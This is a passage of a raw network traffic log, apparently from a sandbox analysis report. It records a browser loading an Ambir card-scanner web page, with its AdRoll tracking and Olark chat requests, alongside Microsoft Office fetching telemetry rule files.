                                                                                                                                                                                              Content-Length: 42
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                              Access-Control-Allow-Headers: Content-Type, *
                                                                                                                                                                                              Access-Control-Allow-Methods: GET
                                                                                                                                                                                              Access-Control-Allow-Origin: https://ambir.com
                                                                                                                                                                                              Access-Control-Expose-Headers: X-Advertisable-Eid, X-Attribution-Url, X-Segment-Eid, X-Segment-Display-Name, X-Segment-Name, X-Conversion-Currency, X-Conversion-Value, X-Rule, X-Rule-Type, X-Organization-Eid, X-Pixel-Eid
                                                                                                                                                                                              Access-Control-Request-Methods: GET
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              P3P: CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              Set-Cookie: __adroll=16b1e49ed627599a8c527b960adbb83e-a_1732134513; Version=1; Expires=Sat, 20-Dec-2025 20:28:35 GMT; Max-Age=34128000; Path=/; HttpOnly; SameSite=None; Secure; Domain=d.adroll.com
                                                                                                                                                                                              Set-Cookie: receive-cookie-deprecation=1; Version=1; Expires=Sat, 20-Dec-2025 20:28:35 GMT; Max-Age=34128000; Path=/; HttpOnly; SameSite=None; Secure; Partitioned; Domain=d.adroll.com
                                                                                                                                                                                              Set-Cookie: receive-cookie-deprecation=1; Version=1; Expires=Sat, 20-Dec-2025 20:28:35 GMT; Max-Age=34128000; Path=/; HttpOnly; SameSite=None; Secure; Partitioned; Domain=adroll.com
                                                                                                                                                                                              Set-Cookie: __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513; Version=1; Expires=Sat, 20-Dec-2025 20:28:35 GMT; Max-Age=34128000; Path=/; HttpOnly; SameSite=None; Secure; Domain=adroll.com
                                                                                                                                                                                              X-Advertisable-Eid: GXXT3DJJNNBKHGBC62RAND
                                                                                                                                                                                              X-Attribution-Url: https%3A%2F%2Fx.adroll.com%2Fattribution%2Ftrigger%3Ffpc%3Dd3ee31a855380a6a19350bbaa666e259%26advertisable_eid%3DGXXT3DJJNNBKHGBC62RAND%26conversion_type%3DPageView%26conversion_value%3D0.0%26currency%3DUSC%26flg%3D1%26pv%3D74305401830.21593%26arrfrr%3Dhttps%253A%252F%252Fambir.com%252Fambir-card-scanners%252F
                                                                                                                                                                                              X-Conversion-Currency:
                                                                                                                                                                                              X-Conversion-Value: 0.0
                                                                                                                                                                                              X-Organization-Eid: YK5WPZRLU5ADVBKNOYLBSZ
                                                                                                                                                                                              X-Pixel-Eid: PQV7D44IFRBCBMEQBHSAR6
                                                                                                                                                                                              X-Rule: *ambir.com/ambir-card-scanners/
                                                                                                                                                                                              X-Rule-Type: s
                                                                                                                                                                                              X-Segment-Display-Name: Card Scanner Page
                                                                                                                                                                                              X-Segment-Eid: HVMGKBGTIZBSRLNIDJBIU7
                                                                                                                                                                                              X-Segment-Name: 43d568ad
                                                                                                                                                                                              2024-11-20 20:28:36 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                              Data Ascii: GIF89a!,D;


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              137192.168.2.54988413.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:35 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:35 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 478
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                              ETag: "0x8DC582B9B233827"
                                                                                                                                                                                              x-ms-request-id: 70a27ff5-201e-0051-4e8c-3a7340000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202835Z-r1d97b995777mdbwhC1TEBezag000000097g00000000r6rx
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:36 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              138192.168.2.54988913.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:35 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:35 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB046B576"
                                                                                                                                                                                              x-ms-request-id: e83eb970-001e-0046-777e-3ada4b000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202835Z-185f5d8b95cwtv72hC1NYC141w0000000apg00000000funp
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:36 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              139192.168.2.54988513.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:35 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:35 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 404
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                              ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                              x-ms-request-id: d277967d-801e-0047-0163-3b7265000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202835Z-178bfbc474bbbqrhhC1NYCvw7400000000qg00000000548h
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:36 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              140192.168.2.54989534.96.127.164431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:35 UTC783OUTGET /nrpc/c?c=create&s=7486-534-10-2045&v=QnUrnKaYLl744rSP542fr0UBrj6a8ok0&i=tM65kxeIWm5Vcm4e542fr0UBjA8B6bor&g=ALL&q=precache038757109200029083&j=o0&version=loader-precache&xhttp=1&u=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&r=&ca=false&ru=false&ae= HTTP/1.1
                                                                                                                                                                                              Host: knrpc.olark.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Origin: https://ambir.com
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:36 UTC512INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: TwistedWeb/22.2.0
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:36 GMT
                                                                                                                                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 20:28:36 UTC
                                                                                                                                                                                              Cache-Control: post-check=0, pre-check=0
                                                                                                                                                                                              X-Rpc: nrpc-http-5d9875854f-rwksj
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                              Content-Disposition: inline; filename="rpc.txt"
                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              2024-11-20 20:28:36 UTC857INData Raw: 33 34 64 0d 0a 7b 22 63 6f 6e 76 65 72 73 61 74 69 6f 6e 5f 68 69 73 74 6f 72 79 22 3a 20 5b 5d 2c 20 22 63 61 70 61 63 69 74 79 22 3a 20 66 61 6c 73 65 2c 20 22 73 69 74 65 5f 69 73 5f 6f 6e 6c 69 6e 65 22 3a 20 66 61 6c 73 65 2c 20 22 73 74 61 74 75 73 5f 73 74 61 74 65 22 3a 20 22 6f 66 66 6c 69 6e 65 22 2c 20 22 63 6f 6e 76 65 72 73 61 74 69 6f 6e 5f 68 61 73 5f 73 6c 6f 74 22 3a 20 66 61 6c 73 65 2c 20 22 68 61 73 5f 66 72 65 65 5f 63 68 61 74 73 22 3a 20 74 72 75 65 2c 20 22 73 69 74 65 5f 63 6f 6e 66 69 67 5f 63 68 61 6e 67 65 64 22 3a 20 66 61 6c 73 65 2c 20 22 61 73 73 65 74 73 5f 63 6f 6e 66 69 67 5f 6d 64 35 22 3a 20 22 63 38 37 64 63 37 66 30 66 36 63 36 63 34 66 39 61 35 30 37 36 31 63 61 62 35 62 38 64 61 38 36 22 2c 20 22 69 70 61 64 64 72
                                                                                                                                                                                              Data Ascii: 34d{"conversation_history": [], "capacity": false, "site_is_online": false, "status_state": "offline", "conversation_has_slot": false, "has_free_chats": true, "site_config_changed": false, "assets_config_md5": "c87dc7f0f6c6c4f9a50761cab5b8da86", "ipaddr


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              141192.168.2.54989013.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:35 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:36 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 400
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                              x-ms-request-id: bfe6d614-201e-006e-7a8c-3abbe3000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202836Z-185f5d8b95cwtv72hC1NYC141w0000000apg00000000fup7
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:36 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              142192.168.2.54989113.251.238.1184431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:36 UTC969OUTGET /pxl/iframe_content.html?adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&advertisable=GXXT3DJJNNBKHGBC62RAND HTTP/1.1
                                                                                                                                                                                              Host: x.adroll.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                                                              Sec-Fetch-Dest: iframe
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              Cookie: receive-cookie-deprecation=1; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513
                                                                                                                                                                                              2024-11-20 20:28:36 UTC238INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:36 GMT
                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                              Content-Length: 666
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              accept-ranges: bytes
                                                                                                                                                                                              last-modified: Tue, 19 Nov 2024 03:19:34 GMT
                                                                                                                                                                                              ad-auction-allowed: true
                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                              2024-11-20 20:28:36 UTC666INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 75 72 6c 50 61 72 61 6d 73 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 29 2c 61 64 76 3d 75 72 6c 50 61 72 61 6d 73 2e 67 65 74 28 22 61 64 76 65 72 74 69 73 61 62 6c 65 22 29 2c 66 70 63 3d 75 72 6c 50 61 72 61 6d 73 2e 67 65 74 28 22 61 64 72 6f 6c 6c 5f 66 70 63 22 29 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 2c 6f 72 69 67 69 6e 3d 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 3b 6c 65 74 20 75 72 6c 3d 6f 72 69 67 69 6e 2b 22 2f 69 67 73 3f 61 64 76
                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><meta charset="UTF-8"><script>const urlParams=new URLSearchParams(document.location.search),adv=urlParams.get("advertisable"),fpc=urlParams.get("adroll_fpc").split("-")[0],origin=document.location.origin;let url=origin+"/igs?adv


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              143192.168.2.549894192.229.233.344431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:36 UTC390OUTGET /a/assets/v0/site/7486-534-10-2045.js?cb=2024-11-20 HTTP/1.1
                                                                                                                                                                                              Host: static.olark.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:36 UTC370INHTTP/1.1 200 OK
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Age: 6789
                                                                                                                                                                                              cache-control: s-max-age=0
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:36 GMT
                                                                                                                                                                                              Etag: 21b3c411436805f5884ca32db35f4fb4
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 18:35:27 GMT
                                                                                                                                                                                              Server: ECS (lhd/35B3)
                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                              X-Cache: HIT
                                                                                                                                                                                              Content-Length: 14510
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              2024-11-20 20:28:36 UTC14510INData Raw: 0a 20 20 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 20 20 20 20 6f 6c 61 72 6b 2e 65 78 74 65 6e 64 28 27 43 61 6c 6c 6f 75 74 42 75 62 62 6c 65 27 29 3b 0a 6f 6c 61 72 6b 2e 65 78 74 65 6e 64 28 27 46 65 65 64 62 61 63 6b 27 29 3b 0a 6f 6c 61 72 6b 2e 65 78 74 65 6e 64 28 27 53 6f 75 6e 64 73 27 29 3b 0a 6f 6c 61 72 6b 2e 65 78 74 65 6e 64 28 27 57 65 6c 63 6f 6d 65 41 73 73 69 73 74 27 29 3b 0a 0a 0a 20 20 20 20 20 20 20 20 76 61 72 20 69 73 4e 65 77 56 65 72 73 69 6f 6e 20 3d 20 6f 6c 61 72 6b 2e 5f 20 26 26 20 6f 6c 61 72 6b 2e 5f 2e 76 65 72 73 69 6f 6e 73 20 26 26 20 28 6f 6c 61 72 6b 2e 5f 2e 76 65 72 73 69 6f 6e 73 2e 66 6f 6c 6c 6f 77 20 7c 7c 20 6f 6c 61 72 6b 2e 5f 2e 76 65 72 73 69 6f 6e 73 2e 70 6f 70 6f 75 74 29 0a 20 20
                                                                                                                                                                                              Data Ascii: (function(){ olark.extend('CalloutBubble');olark.extend('Feedback');olark.extend('Sounds');olark.extend('WelcomeAssist'); var isNewVersion = olark._ && olark._.versions && (olark._.versions.follow || olark._.versions.popout)


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              144192.168.2.549893192.229.233.344431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:36 UTC557OUTGET /jsclient-bucket5/application2.js?v=1732053196593 HTTP/1.1
                                                                                                                                                                                              Host: static.olark.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:36 UTC468INHTTP/1.1 200 OK
                                                                                                                                                                                              Age: 81125
                                                                                                                                                                                              Cache-Control: max-age=86400
                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:36 GMT
                                                                                                                                                                                              Etag: W/"673d0955-1228eb"
                                                                                                                                                                                              Expires: Thu, 21 Nov 2024 20:28:36 GMT
                                                                                                                                                                                              Last-Modified: Tue, 19 Nov 2024 21:55:33 GMT
                                                                                                                                                                                              P3P: CP='Olark does not have a P3P policy. Learn why here: http://olark.com/p3p'
                                                                                                                                                                                              Server: ECS (lhd/35AD)
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                              X-Cache: HIT
                                                                                                                                                                                              Content-Length: 1190123
                                                                                                                                                                                              Connection: close
